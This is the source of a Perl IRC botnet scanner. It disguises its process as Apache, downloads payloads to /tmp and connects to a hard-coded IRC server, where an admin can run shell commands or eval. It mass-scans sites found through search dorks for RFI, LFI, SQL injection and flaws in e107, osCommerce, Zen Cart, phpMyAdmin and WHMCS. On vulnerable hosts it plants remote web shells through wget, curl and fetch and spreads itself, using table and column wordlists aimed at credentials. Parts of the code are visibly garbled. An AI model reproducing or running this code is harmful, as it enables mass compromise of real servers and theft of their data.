#!/usr/bin/perl
###################################################################################
# Bot Scanner UPGRARE by tembAgA ##
# -------------------------------------------------------------------------------##
# MALAYSIAN CODER ##
###################################################################################
####### DON'T MODIF IT or SCRIPT NOT WORK #######
$powered="tembAgA"; #
$mail="amiroth@yahoo.com"; #
#################################################
#################################################
use HTTP::Request; #
use HTTP::Request::Common; #
use HTTP::Request::Common qw(POST); #
use LWP::Simple; #
use LWP 5.53; #
use LWP::UserAgent; #
use Socket; #
use IO::Socket; #
use IO::Socket::INET; #
use IO::Select; #
use MIME::Base64; #
use File::Basename; #
use Getopt::Long; #
use URI; #
#################################################
my @array = (
    'a', 'b',  'c', 'd', 'e', 'f', 'g', 'h', 'i', 'l', 'm', 'n',
    'o', 'p',  'q', 'r', 's', 't', 'u', 'i', 'O', 'Y', 'T', 'Y',
    'O', 'O',  'P', 'p', 'B', 'C', 'R', 'O', 'S', 'E', 'K', 'J',
    'W', 'NS', 'j', 'k', 'v', 'w', 'x', 'z', '1', '2', '3', '4',
    '5', '6',  '7', '8', '9', '0'
);
my $datetime = localtime;
my $fakeproc = "/usr/sbin/apache3 -k start";
my $ircserver = "104.171.118.134";
my $ircport = "6660";
my $nickname = "orked-"
  . $array[ rand(@array) ]
  . $array[ rand(@array) ]
  . $array[ rand(@array) ]
  . $array[ rand(@array) ]
  . $array[ rand(@array) ]
  . $array[ rand(@array) ];
my $ident = "Mibbit";
my $channel = "#komuniti";
my $admin = "pico";
my $fullname = "http://www.mibbit.com";

#########################################################

my $zerologo = "15,1 0[zero]15";;
my $thumblogo = "15,1 0[tim]15";;
my $lfilogo = "15,1 0[lfi]15";;
my $rfilogo = "15,1 0[rfi]15";;
my $e107logo = "15,1 0[e107]15";;
my $xmllogo = "15,1 0[xml]15";;
my $sqllogo = "15,1 0[sql]15";;
my $oscologo = "15,1 0[osco]15";;
my $zenlogo = "15,1 0[zen]15";;
my $oplogo = "15,1 0[op]15";;
my $admlogo = "15,1 0[adm]15";;
my $smslogo = "15,1 0[sms]15";;
my $ossqllogo = "15,1 0[ossql]15";;
my $e107logosql = "15,1 0[e107sql]15";;
my $whmlogo = "15,1 0[whm]15";;

my $thumbcmd = '!tum';
my $zerocmd = '!zero';
my $lficmd = '!lfi';
my $rficmd = '!rfi';
my $e107cmd = '!e107';
my $xmlcmd = '!xml';
my $sqlcmd = '!mysql';
my $oscocmd = '!osco';
my $zencmd = '!zen';
my $admcmd = '!adm';
my $opcmd = '!op';
my $ossqlcmd = '!oscoo';
my $esqlcmd = '!sqle';
my $whmcmd = '!whm';

my $cmdlfi = '!cmdlfi';
my $cmde107 = '!cmde107';
my $cmdxml = '!cmdxml';

##########################################################
my $injector = "http://www.st-williams.com.tw/appserv/AUTHORS.txt";
my $action = "http://www.st-williams.com.tw/appserv/AUTHORS.txt";
my $botshell = "http://www.Sh3LL.org/c99.txt?";
my $botshell2 = "http://www.Sh3LL.org/c99.txt?";
my $thumbshell = "http://www.st-williams.com.tw/appserv/AUTHORS.txt";
#############################################################################################################
my @bypasser = ("http://www.gestion-tripartita.es/google.php","http://www.atpa.cl/wordpress/google.php","http://pvcproject.reecezone.net/google.php");
my $bypass = $bypasser[rand(scalar(@bypasser))];
my $uagent = 'Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0';
my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00";
my $open_test = "/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
my $adm_output = ("uid=");
my $open_output = ("FCKeditor - Connectors Tests");

my @tabele = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator',
'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address',
'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
my @kolumny = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
chdir("/tmp");
chop (my $priper = `wget http://www.daisychainwiltshire.co.uk/images/ewec.jpg -O ewec.jpg;wget http://www.daisychainwiltshire.co.uk/images/ikal.jpg -O ikal.jpg;wget http://kobicom.com/cgi-bin/zeroboard/bbs//data/lovie.jpg -O lovie.jpg;wget http://www.daisychainwiltshire.co.uk/images/logi.jpg -O logi.jpg`);
$ircserver = "$ARGV[0]" if $ARGV[0];
$0 = "$fakeproc"."" x 16;;
my $pid = fork;
exit if $pid;
die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}

sub connector {
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
nick("$mynick");
my $versi = "IDC";
sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi");
sleep (1);}}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($mynick)) {
$mynick = $4;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
}
}
elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$mynick".int rand(1));
}
elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$mynick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
sendraw("MODE $mynick +iB");
sendraw("JOIN $channel");
sleep(2);
sendraw("PRIVMSG $admin : hadir gan ");
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver", "$ircport"); }
select(undef, undef, undef, 0.01);;
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$mynick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $ircmsg, 4096);
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $ircmsg);
$ircmsg =~ s/\r\n$//;

if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
my $engine ="Simbah,Yahoo2,AllTheWeb,Bing,ALtaViSTa,AsK,KvaSiR,GooGLe2,QuinT,YahOo,ByPaSs,SeZnaM,oNeT,iNtEria,Pagina";
if ($path eq $mynick) {
if ($msg =~ /^PING (.*)/) {
sendraw("NOTICE $nick :PING $1");
}
if ($msg =~ /^VERSION/) {
sendraw("NOTICE $nick :VERSION mIRC v7.32 Khaled Mardam-Bey");
}
if ($msg =~ /^TIME/) {
sendraw("NOTICE $nick :TIME ".$datetime."");
}
if (&isAdmin($nick) && $msg eq "!out") {
&shell("$path","kill -9 $$");
}
if (&isAdmin($nick) && $msg eq "!killall") {
&shell("$path","killall -9 perl");
}
if (&isAdmin($nick) && $msg eq "!reset") {
sendraw("QUIT :Restarting...");
}
if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
sendraw("JOIN #".$1);
}
if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
sendraw("PART #".$1);
}
if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
sendraw("NICK ".$1);
}
if (&isAdmin($nick) && $msg =~ /^!pid/) {
sendraw($IRC_cur_socket, "PRIVMSG $nick :9Fake Process/PID : $fakeproc - $$");
}
if (&isAdmin($nick) && $msg !~ /^!/) {
&shell("$nick","$msg");
}
}
else {
if (&isAdmin($nick) && $msg eq "!out") {
&shell("$path","kill -9 $$");
}
if (&isAdmin($nick) && $msg eq "!killall") {
&shell("$path","killall -9 perl");
}
if (&isAdmin($nick) && $msg eq "!reset") {
sendraw("QUIT :Restarting...");
}
if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
sendraw("JOIN #".$1);
}
if (&isAdmin($nick) && $msg eq "!part") {
sendraw("PART $path");
}
if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
sendraw("PART #".$1);
}
if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
&shell("$path","$1");
}
if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
&shell("$path","$1");
}
if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {
eval "$1";
}

##################################################################### HELP COMMAND

if ($msg=~ /^!help/) {
my $helplogo = "15,1(3MULTISCAN15)";
&msg("$path","$helplogo 0 $whmcmd $thumbcmd $zerocmd $lficmd $rficmd $e107cmd $xmlcmd $sqlcmd $oscocmd $zencmd $admcmd $opcmd $ossqlcmd $esqlcmd");
}

if ($msg=~ /^!version/) {
my $versionlogo = "15,1(4@9Version15)";
&msg("$path","$versionlogo 13 Malaysian Coder team ");
}

if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
if (&isFound($injector,"new(GET=>$cracker);

my $useragent = LWP::UserAgent->new();

$useragent->timeout(10);

my $response = $useragent->request($request);

if ($response->is_success) {

my $res = $response->content;

if ($res =~ m/
(.*)/g) {

my $result = $1;

sendraw($IRC_cur_socket, "PRIVMSG $channel :4,1[14MD54]0 Result:5 $hash 0=>9 $result 8!");

}

else {

sendraw($IRC_cur_socket, "PRIVMSG $channel :4,1[14MD54]0 ".$hash." 14not found. 8!");

}

}

else { sendraw($IRC_cur_socket, "PRIVMSG $channel :4,1[14MD54]0 Cannot open DataBase 8!"); }

}

exit;

}

}

if ($msg=~ /^!md5decode (.*)$/ ) {
if (my $pid = fork) {

waitpid($pid, 0);

} else {

if (fork) {

exit;

} else {

my $hash = $1;

sendraw($IRC_cur_socket, "PRIVMSG $channel :4,1[14MD54]0 Try to Convert:5 $hash 8!");

my $cracker = "http://md5.rednoize.com/?q=".$hash;

my $request = HTTP::Request->new(GET=>$cracker);

my $useragent = LWP::UserAgent->new();

$useragent->timeout(10);

my $response = $useragent->request($request);

if ($response->is_success) {

my $res = $response->content;

if ($res =~ m/
(.*)/g) {

my $result = $1;

sendraw($IRC_cur_socket, "PRIVMSG $channel :4,1[14MD54]0 Result:5 $hash 0=>9 $result 8!");

}

else {

sendraw($IRC_cur_socket, "PRIVMSG $channel :4,1[14MD54]0 ".$hash." 14not found. 8!");

}

}

else { sendraw($IRC_cur_socket, "PRIVMSG $channel :4,1[14MD54]0 Cannot open DataBase 8!"); }

}

exit;

}

}

if ($msg=~ /^!ip\s+(.*)/ ) {
if (my $pid = fork) { waitpid($pid, 0); } else {
if (fork) { exit; } else {
my $ip = $1;
&msg("$path","15(9@11IP15)4 Searching ".$ip." 12Location ...");
my $website = "http://www.ipligence.com/geolocation";
my ($useragent,$request,$response,%form);
undef %form;
$form{ip} = $ip;
$useragent = LWP::UserAgent->new;
$useragent->timeout(5);
$request = POST $website,\%form;
$response = $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/Your IP address is(.*)
City:(.*)
Country:(.*)
Continent:(.*)
Time/g) {
my ($ipaddress,$city,$country,$continent) = ($1,$2,$3,$4);
&msg("$path","15(9@4IP15)7 IP Address : ".$ip."15 (4".$ipaddress."15 )");
&msg("$path","15(9@4IP15)7 City : ".$ip."15 (4".$city."15 )");
&msg("$path","15(9@4IP15)7 Country : ".$ip."15 (4".$country."15 )");
&msg("$path","15(9@4IP15)7 Continent : ".$ip."15 (4".$continent."15 )");
}
else {
&msg("$path","15(9@11IP15)7 ".$ip." 6not found in database");
}
}
else {
&msg("$path","15(9@11IP15)4 Cannot open IP database.");
}
}
exit;
}
}

################################ZERO BOARD#####################################

if ($msg=~ /^$zerocmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
&msg("$path","$zerologo 9Dork :4 $dork");
&msg("$path","$zerologo 13Bugz :4 $bug ");
&msg("$path","$zerologo 8Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,14);
}
exit;
}
}
##################################TIMTHUMB####################################

if ($msg=~ /^$thumbcmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($thumbshell,"GIF89a")) {
my ($bug,$dork) = ($1,$2);
&msg("$path","$thumblogo 9Dork :4 $dork");
&msg("$path","$thumblogo 13Bugz :4 $bug ");
&msg("$path","$thumblogo 8Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,15);
}
else {
&msg("$path","[ $nick ] $thumblogo 4TimThumb Uploader is Down!");
}

}
exit;
}
}

##################################################################### RFI SCAN

if ($msg=~ /^$rficmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"<?php")) {
my ($bug,$dork) = ($1,$2);
&msg("$path","$rfilogo 9Dork :4 $dork");
&msg("$path","$rfilogo 13Bugz :4 $bug");
&msg("$path","$rfilogo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,1);
} else {
&msg("$path","[ $nick ] $rfilogo 4PHP Shell Not Found!");
}
}
exit;
}
}

##################################################################### LFI SCAN

if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"<?php")) {
my ($bug,$dork) = ($1,$2);
&msg("$path","$lfilogo 9Dork :4 $dork");
&msg("$path","$lfilogo 13Bugz :4 $bug");
&msg("$path","$lfilogo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,2);
} else {
&msg("$path","[ $nick ] $lfilogo 4PHP Shell Not Found!");
}
}
exit;
}
}

##################################################################### e107 SCAN

if ($msg=~ /^$e107cmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"<?php")) {
my ($bug,$dork) = ("contact.php",$1);
&msg("$path","$e107logo 9Dork :4 $dork");
&msg("$path","$e107logo 13Bugz :4 $bug");
&msg("$path","$e107logo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,3);
} else {
&msg("$path","[ $nick ] $e107logo 4PHP Shell Not Found!");
}
}
exit;
}
}
##################################################################### XML SCAN
if ($msg=~ /^$xmlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"<?php")) {
my ($bug,$dork) = ($1,$2);
&msg("$path","$xmllogo 9Dork :4 $dork");
&msg("$path","$xmllogo 13Bugz :4 $bug");
&msg("$path","$xmllogo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,4);
} else {
&msg("$path","[ $nick ] $xmllogo 4PHP Shell Not Found!");
}
}
exit;
}
}

##################################################################### SQL SCAN

if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
&msg("$path","$sqllogo 9Dork :4 $dork");
&msg("$path","$sqllogo 13Bugz :4 $bug");
&msg("$path","$sqllogo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,5);
}
exit;
}
}

##################################################################### OSCO SCAN

if ($msg=~ /^$oscocmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"<?php")) {
my ($bug,$dork) = ("admin/categories.php/login.php",$1);
&msg("$path","$oscologo 9Dork :4 $dork");
&msg("$path","$oscologo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,6);
} else {
&msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
}
}
exit;
}
}
##################################################################### OSCO2 SCAN

if ($msg=~ /^$oscocmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"<?php")) {
my ($bug,$dork) = ("admin/file_manager.php/login.php",$1);
&scan_start($path,$bug,$dork,$engine,12);
} else {
&msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
}
}
exit;
}
}

##################################################################### OSCOSQL SCAN

if ($msg=~ /^$ossqlcmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
&msg("$path","$ossqllogo 9Dork :4 $dork");
&msg("$path","$ossqllogo 13Bugz :4 $bug");
&msg("$path","$ossqllogo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,10);
}
exit;
}
}

##################################################################### OSCO3 SCAN

if ($msg=~ /^$oscocmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"<?php")) {
my ($bug,$dork) = ("admin/banner_manager.php/login.php",$1);
&msg("$path","$oscologo 9Dork :4 $dork");
&msg("$path","$oscologo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,11);
} else {
&msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
}
}
exit;
}
}
##################################################################### E107SQL SCAN

if ($msg=~ /^$esqlcmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ("contact.php",$1);
&msg("$path","$e107logosql 9Dork :4 $dork")
&msg("$path","$e107logosql 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,13);
}
exit;
}
}
##################################################################### PhpMyAdmin SCAN

if ($msg=~ /^$admcmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ("phpMyAdmin/config/config.inc.php",$1);
&msg("$path","$admlogo 9Dork :4 $dork");
&msg("$path","$admlogo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,7);
}
exit;
}
}
##################################################################### OPENCART SCAN

if ($msg=~ /^$opcmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
&msg("$path","$oplogo 9Dork :4 $dork");
&msg("$path","$oplogo 13Bugz :4 $bug");
&msg("$path","$oplogo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,8);
}
exit;
}
}
##################################################################### ZEN SCAN

if ($msg=~ /^$zencmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
&msg("$path","$zenlogo 9Dork :4 $dork");
&msg("$path","$zenlogo 13Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,9);
}
exit;
}
}
##################################################################### ZEN SCAN

if ($msg=~ /^$zencmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ("admin/record_company.php",$1);
&scan_start($path,$bug,$dork,$engine,9);
}
exit;
}
}
##################################################################### zero SCAN
if ($msg=~ /^$whmcmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
&msg("$path","$whmlogo 3D14ork :4 $dork");
&msg("$path","$whmlogo 3B14ugz :4 $bug");
&msg("$path","$whmlogo 14[-] 3E14xploiting WHMCS start...");
&scan_start($path,$bug,$dork,$engine,16);
}
exit;
}
}
}
}

for(my $c=0; $c 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$rfilogo 4$engine 0 Scan finish"); }
my $coba = "http://".$site.$bug."test??";
my $test = "http://".$site.$bug.$injector."??";
my $dor = "http://".$site.$bug.$botshell."??";
my $dor2 = "http://".$site.$bug.$botshell2."??";
my $cek = &get_content($coba);sleep(1);
&get_content($dor);sleep(1);
&get_content($dor2);sleep(1);
if ($cek =~ /failed to open stream/i) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
&rfi_xpl($test,$chan,$site);
exit;}
}
}
}
}
}

sub rfi_xpl() {
my $url = $_[0];
my $chan = $_[1];
my $site = $_[2];
my $dor = $url.$botshell."??";
my $dor2 = $url.$botshell2."??";
my $test = $url.$injector."??";
my $vuln = $url."14(ZithNet)";
my $check = &get_content($test);
&get_content($dor);sleep(1);
&get_content($dor2);sleep(1);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$rfilogo 9VuLn 13 ".$vuln."9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)(4@9safemode-off15)");
&msg("$admin","$rfilogo 9VuLn 13 ".$vuln."9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");
}
else {&msg("$chan","$rfilogo 11checking 0".$vuln." 7safemode-on");}
}

sub lfi() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$lfilogo 4$engine 0 Scan finish"); }
my $dir = "../../../../../../../../../../../../../";
my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
my $vuln = "http://".$site."12".$bug.$dir."/proc/self/environ%0000";
my $shell = "http://".$site."12".$bug.$dir."/tmp/ewec%0000";
my $html = &get_content($test);
if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $code = 'echo "c0li#".php_uname()."#c0li".get_current_user();if(@copy("'.$injector.'","/tmp/ewec")) { echo "SUCCESS";@copy("'.$botshell.'","/tmp/dev");@copy("'.$botshell2.'","/tmp/ikal"); }';
my $res = lfi_env_query($test,encode_base64($code));
&lfi_spread_query($test);
&get_content("http://".$site.$bug.$dir."/tmp/dev%0000");
&get_content("http://".$site.$bug.$dir."/tmp/ikal%0000");
$res =~ s/\n//g;
if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) {
my $sys = $1;
$nob0dy = $2;
&msg("$chan","$lfilogo(4@3$engine15)15(4@9SHeLL15)13 ".$shell." 15(4@9".$sys."15))15(4@9$nob0dy15)");sleep(2);
}
elsif ($res =~ /c0li#(.*)#c0li(.*)/sg) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $sys = $1;
$nob0dy = $2;
my $upload = 'system("killall -9 perl;killall -9 php;wget '.$injector.' -O images.php;fetch '.$injector.';mv ewec.jpg images.php;wget '.$botshell.' -O cukz.php;fetch '.$botshell.';mv lovie.jpg cukz.php;wget '.$botshell2.' -O detu.php;fetch '.$botshell2.';mv logi.jpg detu.php;");passthru("killall -9 perl;killall -9 php;wget '.$injector.' -O images.php;fetch '.$injector.';mv ewec.jpg images.php;wget '.$botshell.' -O cukz.php;fetch '.$botshell.';mv lovie.jpg cukz.php;wget '.$botshell2.' -O detu.php;fetch '.$botshell2.';mv logi.jpg detu.php;");';
my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2);
my $check = &get_content("http://".$site.$bug.$dir."/tmp/ewec%0000"); sleep(2);
&get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);
&get_content("http://".$site.$bug.$dir."/tmp/ikal%0000");sleep(2);
if ($check =~ /ZITH/) {
&msg("$chan","$lfilogo(4@3$engine15)15(4@9SHeLL15)13 ".$shell." 15(4@3".$sys."15)15(4@9$nob0dy15)");sleep(2);
&msg("$admin","$lfilogo(4@3$engine15)15(4@9SHeLL15)13 ".$shell." 15(4@3".$sys."15)15(4@9$nob0dy15)");sleep(2);
}
else {
&msg("$chan","$lfilogo(4@3$engine15)15(4@9SysTem15)7 ".$vuln." 15(4@3".$sys."15))15(4@9$nob0dy15)");sleep(2);
}
} exit; }
}
else { &msg("$chan","$lfilogo(4@3$engine15)15(4@9EnviRon15)10 ".$vuln); }
} exit; } sleep(2);
}
}
}
}

sub lfi_env_query() {
my $url = $_[0];
my $code = $_[1];
my $ua = LWP::UserAgent->new(agent => "");
$ua->timeout(7);
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);
return $res->content;
}

sub lfi_spread_query() {
my $url = $_[0];
my $code = "system('cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;wget ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;curl -O ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;lwp-download ".$botshell.";php lovie.jpg;fetch ".$botshell2.";php logi.jpg;rm -rf logi.jpg;wget ".$botshell2.";php logi.jpg;rm -rf logi.jpg;curl -O ".$botshell2.";php logi.jpg;rm -rf logi.jpg;lwp-download ".$botshell2.";php logi.jpg;cd /var/tmp;fetch ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;wget ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;curl -O ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;lwp-download ".$botshell.";php lovie.jpg;fetch ".$botshell2.";php logi.jpg;rm -rf logi.jpg;wget ".$botshell2.";php logi.jpg;rm -rf logi.jpg;curl -O ".$botshell2.";php logi.jpg;rm -rf logi.jpg;lwp-download ".$botshell2.";php logi.jpg;rm -rf *.jp*;');";
my $ua = LWP::UserAgent->new(agent => "");
$ua->timeout(7);
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);
}

sub e107() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$e107logo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$e107logo 4$engine 0 Scan finish"); }
my $test = "http://".$site.$bug;
